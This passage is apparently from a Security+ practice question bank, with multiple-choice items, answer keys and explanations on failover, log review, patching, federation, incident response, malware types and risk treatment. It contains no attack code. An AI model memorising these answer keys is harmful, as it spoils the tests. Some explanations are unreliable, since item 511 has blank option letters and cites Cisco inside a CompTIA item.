Option A is wrong because a single flat network provides no segmentation; host firewalls alone cannot enforce network-level isolation between guest, employee, and payment traffic, leaving the payment system exposed to all other devices. Option C is wrong because placing the payment system in a DMZ with direct internet access for database synchronization violates the requirement to separate it from general user traffic and introduces unnecessary exposure to the internet, whereas the database should be accessed only via controlled internal paths. Option D is wrong because NAT on every endpoint does not provide network segmentation or access control; it only hides internal IP addresses, failing to isolate guest, employee, and payment traffic or restrict their communication paths.

500
MCQmedium

Based on the exhibit, which architecture best meets the goal of keeping the order service running if one application server fails?

A.Use one active server with a warm standby server that is started manually during outages.
B.Run the application servers active-active behind the load balancer.
C.Store the application binaries on RAID 1 disks to prevent service interruption.
D.Take nightly backups of the application servers and restore them after a failure.
AnswerB

Active-active design keeps service available because surviving servers continue handling traffic automatically.

Why this answer

Option B is correct because an active-active architecture behind a load balancer ensures that if one application server fails, the load balancer automatically redirects traffic to the remaining healthy server(s). This provides high availability and fault tolerance without manual intervention, keeping the order service running continuously.

Exam trap

The trap here is that candidates often confuse data redundancy (RAID 1) with server-level fault tolerance, or they mistake backup strategies (nightly backups) for high-availability solutions, failing to recognize that only active-active or active-passive clustering with automatic failover meets the requirement of uninterrupted service during a server failure.

How to eliminate wrong answers

Option A is wrong because a warm standby server that is started manually introduces significant downtime (minutes to hours) while an administrator detects the failure and brings the standby online, failing the goal of keeping the service running during a failure. Option C is wrong because RAID 1 (mirroring) protects against disk failure but does not address application server failure; if the server itself crashes or its OS/application becomes unresponsive, the mirrored disks are still inaccessible. Option D is wrong because nightly backups are a disaster recovery measure, not a high-availability solution; restoring from backup can take hours and results in data loss from the last backup point, so the service would be interrupted for an extended period.

501
Multi-Selecthard

A SIEM correlation rule fires for a Microsoft 365 executive mailbox. At 02:14, the account signs in from a new country. At 02:17, the mailbox gets a forwarding rule that sends all mail to an external address. The user says they did not travel and did not create any rules. Which two log sources should the analyst review first to confirm whether this is account takeover or token abuse? Select two.

Select 2 answers
A.Identity provider sign-in logs, because they show source IP, MFA status, and session creation details.
B.Mailbox audit logs, because they record rule creation, forwarding changes, and other post-login mail actions.
C.DHCP lease logs, because they identify the internal workstation that first received the suspicious email.
D.Print server logs, because mailbox forwarding often causes documents to be printed unexpectedly.
E.Physical badge-access logs, because they prove whether the user was in the office when the login occurred.
AnswersA, B

Identity provider sign-in logs are the fastest way to validate where the session came from, whether MFA succeeded, and whether a token or session was issued. That helps distinguish a legitimate login from suspicious access. They also provide the baseline needed to correlate later mailbox activity with the same identity.

Why this answer

Option A is correct because identity provider sign-in logs (e.g., Azure AD sign-in logs) capture the source IP address, MFA status, and session details. In this scenario, reviewing these logs can reveal if the sign-in at 02:14 came from an unusual IP or lacked MFA, indicating a potential account takeover rather than token abuse.

Exam trap

The trap here is that candidates may overlook the need to check both sign-in and mailbox audit logs, assuming one log source alone can distinguish between account takeover and token abuse, when in fact the combination of identity provider logs and mailbox audit logs is required to correlate the sign-in session with the rule creation action.

502
MCQmedium

A system administrator must run a weekly patch-and-restart job on 80 Linux servers without logging in interactively. The job should be repeatable, auditable, and limited to only the required maintenance commands. What is the best approach?

A.Share a root SSH key with the operations team so anyone can run the job.
B.Use a configuration management tool with a dedicated service account and restricted sudo permissions.
C.Have each administrator log in manually and run the commands from an interactive shell.
D.Create a local root account on every server for maintenance tasks.
AnswerB

This supports repeatable automation, centralized auditing, and least privilege by allowing only the needed maintenance actions.

Why this answer

B is correct because configuration management tools (e.g., Ansible, Puppet, or SaltStack) allow you to define a repeatable, auditable patch-and-restart job using a dedicated service account with restricted sudo permissions. This approach enforces the principle of least privilege, logs all actions via the tool's job history, and eliminates the need for interactive login, meeting all requirements for automation, auditability, and command restriction.

Exam trap

The trap here is that candidates may choose Option A (shared root SSH key) because it seems convenient for automation, but they overlook the critical security and auditability requirements that make configuration management with a restricted service account the only correct choice.

How to eliminate wrong answers

Option A is wrong because sharing a root SSH key violates the principle of least privilege and non-repudiation — anyone with the key can execute arbitrary commands as root without an audit trail of who ran what. Option C is wrong because manual interactive login on 80 servers is not repeatable, introduces human error, and fails to provide a centralized audit log; it also violates the requirement to avoid interactive login. Option D is wrong because creating a local root account on every server increases the attack surface, makes key management and auditing nearly impossible, and directly contradicts the need for a restricted, auditable process.

503
MCQmedium

Based on the exhibit, what is the best cloud identity control to ensure terminated users lose access to the SaaS application quickly and consistently?

A.Keep the SaaS local user accounts and require the help desk to disable them manually after each termination.
B.Enable federated authentication with the corporate IdP and automate provisioning and deprovisioning with SCIM.
C.Create a shared emergency administrator account so access can be revoked by changing one password.
D.Require users to clear browser cookies after termination so the SaaS session expires sooner.
AnswerB

Federation centralizes authentication in the corporate identity provider, and SCIM automates account lifecycle changes based on HR events. That means terminations, transfers, and new hires can be reflected quickly in the SaaS application without relying on manual email tickets. This reduces orphaned accounts and improves consistency across the cloud environment.

Why this answer

Option B is correct because federated authentication with a corporate identity provider (IdP) combined with SCIM (System for Cross-domain Identity Management) ensures that when a user is terminated in the IdP (e.g., Active Directory or Azure AD), the SaaS application is automatically notified via SCIM to deprovision the user account. This eliminates manual intervention and guarantees consistent, near-instant revocation of access across all federated SaaS applications.

Exam trap

The trap here is that candidates often confuse session management (clearing cookies) with account deprovisioning, or they assume manual processes are acceptable for security, when the exam emphasizes automation and centralized identity management for consistency and speed.

How to eliminate wrong answers

Option A is wrong because keeping local SaaS accounts and manually disabling them via the help desk introduces human delay and inconsistency, violating the principle of automated, timely deprovisioning. Option C is wrong because a shared emergency administrator account does not address individual user termination; changing one password would affect all administrators, not just the terminated user, and violates non-repudiation and least privilege. Option D is wrong because clearing browser cookies only ends the current session on that specific browser; it does not revoke the user's underlying account or prevent re-authentication from other devices, and the user could simply log in again.

504
MCQmedium

A security analyst detects unusual outbound traffic from a workstation to an external IP address known for command and control. The analyst has verified the alert and wants to contain the threat. According to the NIST SP 800-61 incident response process, which of the following steps should the analyst take FIRST?

A.Disconnect the workstation from the network
B.Perform a forensic analysis of the workstation
C.Reimage the workstation
D.Alert the system administrator
AnswerA

This is correct because it directly implements containment by isolating the compromised workstation, preventing further data exfiltration or lateral movement.

Why this answer

According to NIST SP 800-61, the first step in containment during incident response is to prevent further damage by isolating the compromised system. Disconnecting the workstation from the network immediately stops the outbound command-and-control traffic, preventing data exfiltration and further compromise. This aligns with the 'containment' phase before any analysis or remediation occurs.

Exam trap

The trap here is that candidates often confuse the order of incident response phases, choosing forensic analysis (Option B) first instead of containment, because they mistakenly believe evidence preservation must precede network isolation.

How to eliminate wrong answers

Option B is wrong because performing a forensic analysis is part of the 'eradication' or 'post-incident' phase, not the first containment step; analyzing the system while it is still connected risks further data loss or attacker interference. Option C is wrong because reimaging the workstation destroys evidence and is a remediation step that should only occur after containment and forensic preservation. Option D is wrong because alerting the system administrator is a communication step that may happen in parallel, but the immediate technical containment action—disconnecting the network—takes priority to stop active malicious traffic.

505
MCQhard

Based on the exhibit, which document should be created or updated to make these settings mandatory and measurable? Endpoint baseline draft: - Full-disk encryption should be enabled on all corporate laptops. - Screen lock should activate after 15 minutes of inactivity. - Users should choose strong passwords. Related documents: Policy: Acceptable Use Policy Standard: none Procedure: Laptop imaging steps Guideline: Suggested hardening tips

A.Update the policy because policies are always the most detailed technical documents.
B.Create or update a standard because it defines mandatory, specific minimum requirements.
C.Update the procedure because procedures are the best place for corporate requirements.
D.Update the guideline because guidelines are the strongest way to enforce compliance.
AnswerB

A standard turns high-level intent into enforceable baseline requirements that can be tested and audited consistently.

Why this answer

A standard defines mandatory, specific minimum requirements that must be met, such as 'full-disk encryption enabled' and 'screen lock after 15 minutes.' Unlike policies (high-level intent) or guidelines (suggestions), a standard provides measurable criteria that can be audited and enforced. Creating or updating a standard makes the endpoint baseline settings mandatory and measurable.

Exam trap

The trap here is confusing the role of a policy (broad intent) with a standard (specific, mandatory requirements), leading candidates to choose 'Update the policy' because they assume policies are the most authoritative document for technical settings.

How to eliminate wrong answers

Option A is wrong because policies are high-level statements of intent, not detailed technical requirements; they lack the specificity needed for measurable enforcement. Option C is wrong because procedures describe step-by-step instructions for tasks (e.g., laptop imaging), not mandatory requirements that apply to all endpoints. Option D is wrong because guidelines are advisory recommendations, not enforceable mandates, and thus cannot make settings mandatory or measurable.

506
MCQeasy

Based on the exhibit, what type of malware is most likely present?

A.Ransomware, because the files are being renamed and recovery copies are being deleted.
B.Adware, because documents are no longer opening correctly.
C.Rootkit, because the system is using a command-line utility.
D.Spyware, because the attacker wants to read user documents.
AnswerA

The combination of shadow copy deletion, mass file renaming, and a ransom note is a strong match for ransomware. The attacker is attempting to prevent recovery while demanding payment or coercing the victim, which is exactly the pattern shown in the exhibit.

Why this answer

The exhibit shows files being renamed with a new extension and recovery copies (shadow copies) being deleted via vssadmin.exe. This is a classic ransomware behavior: encrypting user files and removing Volume Shadow Copy backups to prevent recovery without the attacker's key. Ransomware specifically targets document files and system restore points to maximize extortion leverage.

Exam trap

The trap here is that candidates see 'command-line utility' and think rootkit, but vssadmin deletion is a hallmark of ransomware, not a rootkit's stealth or persistence mechanism.

How to eliminate wrong answers

Option B is wrong because adware typically displays unwanted advertisements or redirects browser traffic, not renames files or deletes shadow copies; document opening issues here are a symptom of encryption, not adware. Option C is wrong because a rootkit hides its presence and provides privileged access, but using a command-line utility like vssadmin is a common ransomware action, not indicative of rootkit functionality. Option D is wrong because spyware covertly collects user data (keystrokes, browsing habits) without altering files; the attacker renaming and deleting backups points to encryption for ransom, not passive data theft.

507
MCQmedium

A help desk technician receives an SMS claiming to be from the mobile carrier. The message says the user's corporate number will be suspended unless they open a link and confirm an MFA code. The user has not reported any account issues. What attack is this?

A.Spear phishing
B.Smishing
C.Vishing
D.Baiting
AnswerB

Smishing is phishing delivered through SMS, and the attacker is using urgency and a fake carrier notice to steal credentials or MFA codes.

Why this answer

Smishing is a phishing attack conducted via SMS (Short Message Service). The message impersonates the mobile carrier, creates urgency by threatening suspension, and lures the user to a malicious link to capture MFA codes or credentials. Since the attack vector is SMS, not email or voice, this is smishing.

Exam trap

The trap here is confusing the delivery method (SMS vs. email vs. voice) — candidates often pick 'spear phishing' because the message is personalized, but the defining characteristic is the SMS channel, which makes it smishing.

How to eliminate wrong answers

Option A is wrong because spear phishing is a targeted email-based attack that uses personalized information to trick a specific individual, not an SMS message. Option C is wrong because vishing (voice phishing) is conducted over phone calls, not text messages.

508
MCQmedium

A development team wants to deploy a new internal application without managing operating system patching, runtime updates, or automatic scaling. The security team still wants the company to control the application code and its data access settings. Which cloud service model best fits this need?

A.Infrastructure as a Service, because the company can ignore guest OS patching entirely.
B.Platform as a Service, because the provider manages the platform and the company manages the application and data.
C.Software as a Service, because the team can deploy custom application code inside the vendor portal.
D.On-premises hosting, because the company can still use the provider's patching tools.
AnswerB

PaaS shifts patching and scaling responsibilities to the provider while preserving customer control over code, configurations, and data.

Why this answer

Platform as a Service (PaaS) is the correct choice because the provider manages the underlying platform—including OS patching, runtime updates, and automatic scaling—while the company retains control over the application code and data access settings. This aligns with the shared responsibility model where the customer is responsible for the application and data, not the infrastructure.

Exam trap

The trap here is that candidates confuse PaaS with IaaS, assuming 'no patching' means IaaS, but IaaS still requires the customer to patch the guest OS and runtime, whereas PaaS fully offloads that responsibility.

How to eliminate wrong answers

Option A is wrong because Infrastructure as a Service (IaaS) requires the customer to manage guest OS patching and runtime updates, contradicting the team's desire to avoid those tasks. Option C is wrong because Software as a Service (SaaS) does not allow the customer to deploy custom application code; it only provides pre-built applications accessed via a vendor portal. Option D is wrong because on-premises hosting places full responsibility for patching and scaling on the company, not the provider, and does not eliminate the need for OS management.

509
MCQmedium

After several employees clicked on phishing emails, management wants to reduce future click rates and show measurable improvement across finance, HR, and executive assistants. Which control best meets that goal?

A.Send a one-time company-wide memo reminding users not to click suspicious links.
B.Use role-based security awareness training with phishing simulations and metrics tracking.
C.Disable all external email attachments for every department indefinitely.
D.Require employees to complete annual policy acknowledgment without testing.
AnswerB

Role-based awareness training with phishing simulations is the best fit because it directly targets user behavior and lets the security team measure results. Different job roles face different lures, so tailoring content to finance, HR, and executive assistants improves relevance. Tracking click rates, report rates, and repeat offenders also shows whether the program is working and supports continuous improvement.

Why this answer

Option B is correct because role-based security awareness training with phishing simulations and metrics tracking directly addresses the human factor by tailoring content to specific job roles (finance, HR, executive assistants) and provides measurable improvement through simulation click-rate data. This approach aligns with the NIST SP 800-50 framework for continuous security awareness, enabling management to track reduction in click rates over time.

Exam trap

The trap here is that candidates often choose Option A or D because they equate 'training' with a one-time communication or annual sign-off, failing to recognize that measurable improvement requires simulation, role-specific content, and ongoing metrics tracking as specified in the CompTIA SY0-701 objectives for security awareness programs.

How to eliminate wrong answers

Option A is wrong because a one-time memo lacks reinforcement, metrics, and simulation, so it cannot provide measurable improvement or change long-term behavior. Option C is wrong because disabling all external email attachments for every department indefinitely is overly restrictive, breaks legitimate business workflows (e.g., finance receiving invoices, HR receiving resumes), and does not train users to recognize phishing. Option D is wrong because annual policy acknowledgment without testing or simulation does not measure actual user behavior or reduce click rates; it only confirms policy receipt, not comprehension or application.

510
MCQmedium

An engineering tool runs on an unsupported operating system, but the tool is used only occasionally and can be replaced by a supported cloud service with little workflow impact. Which risk treatment is best?

A.Accept the risk because the tool is old and still functions
B.Transfer the risk to the cloud provider without making changes
C.Avoid the risk by retiring the unsupported system and replacing it with the supported service
D.Compensate for the risk by adding more user passwords
AnswerC

Avoiding the risk is the best treatment because the organization has a practical replacement that does not significantly disrupt the workflow. Retiring the unsupported system removes the vulnerability source instead of merely reducing exposure. When a lower-risk alternative is available and business impact is manageable, elimination of the risk is often better than accepting or compensating for it.

Why this answer

Option C is correct because the best risk treatment for an unsupported operating system that is only used occasionally and can be replaced with minimal workflow impact is to avoid the risk entirely. By retiring the unsupported system and migrating to the supported cloud service, the organization eliminates the security vulnerabilities and compliance issues associated with the outdated OS. This aligns with the risk avoidance strategy, which is preferred when the cost of mitigation is low and the risk is high.

Exam trap

The trap here is that candidates may confuse risk acceptance with a viable option when the tool 'still functions,' failing to recognize that unsupported systems pose an active security threat that cannot be safely accepted without compensating controls.

How to eliminate wrong answers

Option A is wrong because accepting the risk for an unsupported operating system ignores the lack of security patches, leaving the system vulnerable to exploits that could compromise the entire network. Option B is wrong because transferring the risk to a cloud provider without making changes implies that the unsupported system remains in place, and risk transfer typically involves insurance or contracts, not simply using a cloud service without migration. Option D is wrong because compensating with more user passwords does not address the core issue of an unsupported OS; password policies cannot patch kernel vulnerabilities or missing security updates.

511
Multi-Selectmedium

An organization is updating its security policies to align with modern threats and compliance requirements. Which of the following are key security concepts that should be explicitly addressed in these updated policies? (Choose four.)

Select 4 answers
.Data classification and handling procedures to protect sensitive information
.Incident response procedures to ensure a structured approach to security events
.Change management processes to control modifications to systems and configurations
.Password complexity and rotation requirements for all user accounts
.Requiring all employees to use the same shared administrative account for efficiency
.Allowing unrestricted personal device usage on the corporate network without controls

Why this answer

Data classification and handling procedures are correct because they define how sensitive information is identified, labeled, and protected throughout its lifecycle, which is essential for compliance with regulations like GDPR or HIPAA. Incident response procedures are correct because they provide a structured, repeatable process (e.g., NIST SP 800-61) to detect, contain, eradicate, and recover from security events, minimizing damage. Change management processes are correct because they ensure that all system and configuration changes are reviewed, approved, and documented, reducing the risk of unauthorized or misconfigured changes that could introduce vulnerabilities.

Password complexity and rotation requirements are correct because they enforce strong authentication practices, mitigating brute-force and credential-stuffing attacks, though modern guidance (NIST SP 800-63B) emphasizes length and complexity over arbitrary rotation.

Exam trap

Cisco often tests the misconception that password rotation is always required, but modern standards (NIST SP 800-63B) recommend rotation only when compromise is suspected, focusing instead on password length and multi-factor authentication, so candidates must recognize that rotation is still a valid policy element for many compliance frameworks.

512
MCQmedium

A finance application has a known vulnerability in a third-party reporting component. The vendor says a patch will not be available for six months, but the business cannot stop using the application. What is the BEST risk treatment for the organization to pursue next?

A.Avoid the risk by shutting down the finance application immediately.
B.Mitigate the risk by adding compensating controls and tracking residual risk until the patch is available.
C.Transfer the risk by asking the vendor to guarantee that no incident will occur.
D.Accept the risk because any delay in patching is automatically low priority.
AnswerB

This approach reduces the likelihood or impact of exploitation while keeping the business service running. Compensating controls such as increased monitoring, segmentation, additional access restrictions, and temporary workarounds are appropriate when a patch is unavailable. The organization can then document the remaining risk, assign an owner, and revisit the issue when the vendor releases the fix.

Why this answer

Option B is correct because when a known vulnerability exists in a third-party component and patching is delayed, the best risk treatment is to implement compensating controls (such as network segmentation, WAF rules, or input validation) to reduce the likelihood or impact of exploitation. This approach allows the business to continue operations while actively tracking residual risk until the vendor releases the patch. It aligns with the NIST risk management framework, which prioritizes mitigation when avoidance is not feasible.

Exam trap

The trap here is that candidates confuse 'accepting risk' with 'doing nothing,' but in CompTIA's framework, risk acceptance requires a formal decision by management after evaluating the risk level, not an automatic deferral due to a delayed patch.

How to eliminate wrong answers

Option A is wrong because shutting down the finance application immediately would avoid the risk but is not feasible as the business cannot stop using the application, making this an impractical business decision. Option C is wrong because risk transfer requires a third party to accept financial liability (e.g., through insurance or outsourcing), and asking a vendor to 'guarantee no incident' is not a valid risk transfer mechanism—vendors typically do not assume operational risk for unpatched vulnerabilities. Option D is wrong because accepting risk without analysis or compensating controls is negligent; the vulnerability is known and the application is critical, so acceptance should only be considered after a formal risk assessment and only if the residual risk is within the organization's appetite, not automatically due to a delayed patch.

513
MCQmedium

A manufacturer needs to grant a partner company access to a procurement portal. Partner users should authenticate with their own identity provider, and the manufacturer does not want to create local passwords for each partner employee. Which design best supports this?

A.Create local accounts for every partner user and reset passwords manually when staff changes occur.
B.Share one VPN credential with the partner organization and let them manage access internally.
C.Use NTLM pass-through authentication to avoid setting up trust relationships.
D.Establish federation with SAML or OIDC and support just-in-time provisioning for partner users.
AnswerD

Federation lets partner users authenticate through their own identity provider while the portal trusts that assertion and creates accounts as needed.

Why this answer

Federation with SAML or OIDC allows the partner company to use its own identity provider for authentication, eliminating the need for local passwords. Just-in-time provisioning automatically creates user accounts in the manufacturer's procurement portal upon first successful authentication, ensuring access is granted without manual account management. This design supports secure cross-organization trust without sharing credentials or maintaining duplicate user stores.

Exam trap

The trap here is that candidates may confuse NTLM pass-through authentication (Option C) as a viable cross-org solution, not realizing it requires a direct Active Directory trust and cannot work without establishing a federation relationship, whereas federation with SAML/OIDC is the correct modern approach for external identity provider integration.

How to eliminate wrong answers

Option A is wrong because creating local accounts for every partner user and manually resetting passwords on staff changes is operationally unsustainable, violates the principle of least privilege, and introduces password management overhead that federation avoids. Option B is wrong because sharing one VPN credential violates the principle of non-repudiation and accountability, as it cannot distinguish individual users, and the partner cannot securely manage internal access without per-user authentication. Option C is wrong because NTLM pass-through authentication is a legacy Windows protocol that requires direct trust relationships between domains, does not support modern identity federation standards like SAML or OIDC, and is unsuitable for cross-organizational access without establishing a trust.

514
MCQmedium

A security analyst notices unusual outbound traffic from a server that normally only communicates with internal clients. The traffic is encrypted and goes to an external IP address not on any blocklists. The analyst also finds a new scheduled task on the server that runs a PowerShell script. Which of the following best describes the analyst's immediate next step in the incident response process?

A.Disconnect the server from the network to contain the potential breach.
B.Wipe the server and restore from a known good backup.
C.Run a full antivirus scan on the server to identify malware.
D.Inform the legal department and law enforcement.
AnswerA

This is correct because containment is the immediate priority in incident response to stop the threat from spreading or causing more harm. Disconnecting the network cable or disabling the network interface is a simple and effective containment action.

Why this answer

According to standard incident response frameworks such as NIST SP 800-61, containment is one of the first and most critical steps after detecting a potential compromise. The unusual encrypted outbound traffic and the unauthorized scheduled task are strong indicators of compromise (IOCs). Disconnecting the server from the network immediately helps prevent further data exfiltration, lateral movement, or additional damage.

Other actions, such as running a scan, wiping the server, or notifying legal, are performed later in the process after containment and evidence preservation.

515
Multi-Selecthard

A customer portal team must keep an unsupported Linux appliance online for 60 days while a replacement is built. The appliance processes payment tokens and cannot be patched until the vendor certifies the new image. Which two actions best reduce the residual risk during the 60-day window? Select two.

Select 2 answers
A.Move the appliance onto the flat user VLAN so the team can monitor it with standard workstation tools.
B.Restrict network paths to only the required upstream and downstream systems through firewall allow-lists.
C.Declare the risk fully accepted and make no configuration changes until the replacement is ready.
D.Add compensating controls such as application allow-listing, enhanced logging, and SIEM alerting.
E.Disable logging because the appliance is already at capacity and logs can slow it down.
AnswersB, D

This limits attack surface by allowing only necessary traffic, which directly reduces the likelihood of exploitation.

Why this answer

Option B is correct because restricting network paths to only required upstream and downstream systems via firewall allow-lists reduces the attack surface by limiting the appliance's exposure to unnecessary network traffic. This is a classic network segmentation compensating control that mitigates the risk of lateral movement from an unpatched, vulnerable system. By enforcing strict ingress/egress rules, the team can prevent unauthorized access and contain potential exploits during the 60-day window.

Exam trap

The trap here is that candidates may think 'accepting the risk' (Option C) is the only valid response when a patch cannot be applied, but CompTIA expects you to recognize that compensating controls must still be implemented to reduce residual risk to an acceptable level.

516
MCQeasy

A laptop is suspected of being compromised, and the responder wants to preserve useful evidence before shutting it down. What should be done first?

A.Power off the laptop immediately to stop all attacker activity.
B.Capture volatile data such as memory and running processes if possible.
C.Install a new antivirus product before collecting evidence.
D.Reimage the laptop so the user can return to work quickly.
AnswerB

Capturing volatile data is the best first step when preserving evidence matters. Memory can contain malware code, encryption keys, active network sessions, and signs of lateral movement that disappear after shutdown. In incident response, responders try to preserve the most time-sensitive evidence before disrupting the system, as long as doing so is safe and approved.

Why this answer

Option B is correct because volatile data (e.g., RAM contents, running processes, network connections) is lost when the laptop is powered off. Capturing this data first preserves critical evidence of the attacker's current activity, such as malware in memory or active network connections, which is essential for forensic analysis. This aligns with the forensic principle of order of volatility, where the most volatile data is collected first.

Exam trap

The trap here is that candidates often think immediate shutdown stops the attack, but CompTIA tests the forensic principle that volatile data must be captured first to preserve evidence that disappears on power loss.

How to eliminate wrong answers

Option A is wrong because immediately powering off the laptop destroys volatile data (e.g., memory, running processes, network connections) that may contain critical evidence of the compromise, such as active malware or attacker commands. Option C is wrong because installing a new antivirus product modifies the system state (e.g., writes files, changes registry entries), potentially overwriting or destroying existing evidence, and is not a forensic best practice. Option D is wrong because reimaging the laptop completely wipes all data, including evidence of the compromise, making forensic analysis impossible and violating evidence preservation protocols.

517
Multi-Selectmedium

A SIEM rule flags a Linux server because it makes outbound HTTPS connections to the same cloud IP every 15 minutes. The server runs an approved patch agent that should check in on a regular schedule. Which two checks best validate whether the alert is a false positive? Select two.

Select 2 answers
A.Compare the process name, parent process, and digital signature to the approved agent baseline.
B.Verify the destination domain and certificate chain against vendor documentation.
C.Assume the traffic is benign because it happens on a fixed schedule.
D.Suppress all alerts from the host permanently after this one event.
E.Stop collecting logs from the server so the same alert does not recur.
AnswersA, B

Correct because a known process tree and valid signature are strong indicators that the behavior belongs to the sanctioned patch agent. This helps confirm whether the activity matches expected system behavior.

Why this answer

Option A is correct because comparing the process name, parent process, and digital signature against the approved agent baseline directly validates that the traffic originates from the legitimate patch agent and not from malware masquerading as the agent. This is a standard host-based validation technique to confirm the source process integrity before investigating network alerts.

Exam trap

The trap here is that candidates may think a fixed schedule alone is sufficient to dismiss the alert (Option C), but CompTIA expects you to validate both the source process integrity and the destination legitimacy before concluding a false positive.

518
MCQeasy

Before applying a critical patch to a production application server, which action best reduces the risk of extended downtime if the patch fails?

A.Apply the patch immediately without testing so the system is protected sooner.
B.Create a verified backup or rollback plan before making the change.
C.Disable logging so the patch process uses fewer resources.
D.Postpone the patch indefinitely until all business users request it.
AnswerB

A verified backup or rollback plan is the best safeguard because it gives the team a way to recover quickly if the patch causes instability. In patch management, resilience matters as much as speed. Planning for restoration before the change reduces downtime, supports change control, and helps the business continue operating if the update introduces problems.

Why this answer

Creating a verified backup or rollback plan before applying a critical patch ensures that if the patch causes unexpected failures or incompatibilities, the system can be restored to its previous stable state quickly. This directly reduces the risk of extended downtime by providing a reliable recovery path, which is a fundamental principle of change management and risk mitigation in production environments.

Exam trap

The trap here is that candidates may think immediate patching (Option A) is always the best security practice, but the question specifically asks about reducing the risk of extended downtime if the patch fails, not about security speed, so the correct answer focuses on recovery preparedness.

How to eliminate wrong answers

Option A is wrong because applying the patch immediately without testing bypasses validation and increases the likelihood of a failure that could cause extended downtime, as there is no rollback plan or backup to recover from. Option C is wrong because disabling logging does not reduce downtime risk; it actually hinders troubleshooting by removing forensic evidence needed to diagnose patch failures, and resource savings are negligible compared to the risk of extended outage. Option D is wrong because postponing the patch indefinitely leaves the system vulnerable to known exploits, and waiting for all business users to request it is impractical and violates security best practices for timely patch management.

519
MCQeasy

A support portal has a search field that accepts customer last names. After a tester enters a single quote, the application returns a database syntax error. Which attack is the tester most likely trying to verify?

A.Cross-site scripting (XSS)
B.SQL injection
C.CSRF
D.SSRF
AnswerB

SQL injection happens when user input is inserted into a database query without proper validation or parameterization. A single quote causing a syntax error is a common sign that the input is affecting the SQL statement.

Why this answer

The tester is most likely trying to verify a SQL injection vulnerability. Entering a single quote into a search field that interacts with a database can break the SQL query syntax if user input is improperly sanitized, causing the database to return a syntax error. This error indicates that the input is being directly concatenated into a SQL statement, confirming the presence of a SQL injection flaw.

Exam trap

The trap here is that candidates may confuse the database syntax error with a client-side script execution indicator, leading them to choose XSS, but the error is a direct result of SQL syntax breakage, not script injection.

How to eliminate wrong answers

Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts into web pages viewed by other users, and a database syntax error is not a typical indicator of XSS; XSS would manifest as script execution in the browser, not a backend database error. Option C is wrong because Cross-Site Request Forgery (CSRF) exploits the trust a site has in a user's browser by tricking the user into making unintended requests, and a single quote in a search field does not trigger a CSRF attack or produce a database syntax error. Option D is wrong because Server-Side Request Forgery (SSRF) involves manipulating the server to make requests to internal or external resources, and a database syntax error from a single quote is not related to SSRF; SSRF would typically involve URL manipulation or protocol-based attacks.

520
MCQmedium

A help desk technician reports that a user's account was locked out three times overnight. The security team reviews the authentication logs and discovers that the lockouts resulted from failed login attempts originating from a single external IP address, each attempt using a slightly different variation of the user's password. Which of the following should the security analyst do FIRST?

A.Block the external IP address at the perimeter firewall.
B.Disable the user account and require a password reset.
C.Investigate the user's recent activity for signs of compromise.
D.Increase the account lockout threshold to prevent future lockouts.
AnswerC

Correct. The analyst should first gather contextual information about the user's account, recent successful logins, and any other anomalous behavior. This investigation determines whether the account was actually breached and informs subsequent containment and remediation steps.

Why this answer

Option C is correct because the pattern of failed login attempts from a single external IP using password variations suggests a brute-force or password-spraying attack. The security analyst must first investigate the user's recent activity to determine if the account was successfully compromised or if the attacker gained access via a successful login attempt before the lockouts occurred. This aligns with the incident response process, where identification and analysis precede containment actions like blocking IPs or resetting passwords.

Exam trap

The trap here is that candidates may jump to immediate containment (blocking the IP or disabling the account) without first verifying whether the attack succeeded, which violates the incident response principle of 'identify before contain' and could disrupt legitimate access or miss evidence of a breach.

How to eliminate wrong answers

Option A is wrong because blocking the external IP at the perimeter firewall is a containment step that should be taken after confirming the attack is malicious and not a false positive (e.g., a legitimate user with a forgotten password). Option B is wrong because disabling the user account and requiring a password reset is premature without first verifying that the account was actually compromised; the lockouts may have prevented any unauthorized access. Option D is wrong because increasing the account lockout threshold weakens security posture and does not address the root cause; it may allow more brute-force attempts before lockout, increasing the risk of successful password guessing.

521
MCQmedium

After an endpoint cleanup, an EDR agent shows inconsistent results: a suspicious process does not appear in normal task listings, a file in System32 is hidden from user-mode tools, and some security logs stop recording events at the same time. Which malware type best matches these symptoms?

A.Rootkit, because it hides processes, files, or activity from standard system tools.
B.Spyware, because it secretly collects user information and browser data.
C.Worm, because it spreads quickly through network shares and email attachments.
D.Trojan, because it masquerades as legitimate software to trick the user.
AnswerA

Rootkits are designed to conceal malware and attacker activity by altering how the operating system reports processes, files, or logs.

Why this answer

A rootkit is designed to hide its presence and the presence of associated processes, files, and system activities from standard operating system tools and user-mode APIs. The symptoms described—a process invisible to task listings, a hidden file in System32, and security logs ceasing to record events—are classic indicators of kernel-mode or user-mode rootkit behavior that intercepts system calls to filter out its own artifacts.

Exam trap

The trap here is that candidates confuse the 'hiding' behavior of a rootkit with the 'deception' of a trojan or the 'collection' of spyware, but only a rootkit specifically subverts the OS's own APIs to conceal its presence from standard administrative tools.

How to eliminate wrong answers

Option B is wrong because spyware focuses on covert data collection (e.g., keystrokes, browsing habits) and does not inherently hide processes, files, or disable security logging. Option C is wrong because a worm's primary characteristic is self-replication and network propagation, not stealth mechanisms to evade detection by task manager or hide files in System32. Option D is wrong because a trojan relies on social engineering to appear legitimate, but its core behavior does not include the systematic hiding of processes and files from system tools or the suppression of security event logs.

522
Multi-Selectmedium

A finance workstation is suspected of running malware. It is still powered on, the user is logged in, and the network cable is connected. Which two actions best preserve volatile evidence before shutdown? Select two.

Select 2 answers
A.Capture RAM or a volatile memory image before the system is powered off
B.Record running processes, open network connections, and logged-on users
C.Shut the workstation down immediately and restart it cleanly
D.Run a disk defragmentation utility to prepare for imaging
E.Uninstall the suspected malware before collecting any evidence
AnswersA, B

Memory can contain running processes, network sessions, encryption keys, and malware artifacts that disappear on shutdown.

Why this answer

Option A is correct because capturing RAM or a volatile memory image preserves data that is lost when the system is powered off, such as running processes, encryption keys, and network connections. This is a fundamental step in forensic incident response to ensure volatile evidence is not destroyed before analysis.

Exam trap

The trap here is that candidates may think immediate shutdown is safe or that disk defragmentation is a valid preparation step, but both destroy or alter evidence, violating forensic preservation principles.

523
MCQeasy

After installing a free PDF-to-Word utility from an unofficial website, a user's laptop starts sending data to an unknown server and the security agent is disabled. Which malware type best fits?

A.Trojan
B.Worm
C.Spyware
D.Rootkit
AnswerA

A trojan disguises itself as useful software while secretly installing malicious behavior.

Why this answer

